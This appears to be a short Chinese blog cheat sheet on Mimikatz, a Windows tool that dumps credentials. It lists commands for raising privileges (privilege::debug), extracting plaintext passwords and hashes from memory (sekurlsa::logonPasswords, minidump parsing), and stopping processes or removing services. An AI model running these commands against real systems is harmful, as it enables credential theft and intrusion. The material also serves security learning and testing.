Mimikatz命令简单使用

Posted 2021-01-31 threesoil

简介

Mimikatz是法国人Gentil Kiwi写的一款windows平台下的轻量级调试器，于2014年4月发起。它的功能非常强大，支持从windows进程lsass.exe 里猎取windows处于active状态账号明文密码、哈希、PIN码和Kerberos凭证，以及pass-the-hash、pass-the-ticket、build Golden tickets等数种黑客技术，还可以本地提权等操作，在内网中杀伤力很大。

命令:       

• cls-----------------------------清屏
• exit----------------------------退出
• version------------查看mimikatz的版本
• system::user-----查看当前登录的系统用户
• system::computer-------查看计算机名称
• process::list------------------列出进程
• process::suspend 进程名称 -----暂停进程
• process::stop 进程名称---------结束进程
• process::modules --列出系统的核心模块及所在位置
• service::list---------------列出系统的服务
• service::remove-----------移除系统的服务
• service::start stop 服务名称--启动或停止服务
• privilege::list---------------列出权限列表
• privilege::enable--------激活一个或多个权限
• privilege::debug-----------------提升权限
• nogpo::cmd------------打开系统的cmd.exe
• nogpo::regedit -----------打开系统的注册表
• nogpo::taskmgr-------------打开任务管理器
• ts::sessions-----------------显示当前的会话
• ts::processes------显示进程和对应的pid情况等
• sekurlsa::wdigest-----获取本地用户信息及密码
• sekurlsa::tspkg------获取tspkg用户信息及密码
• sekurlsa::logonPasswords--获登陆用户信息及密码
• sekurlsa::minidump 1.dmp --对内存dump文件进行破解
• sekurlsa::logonPasswords full--破解内存中所有保存的密码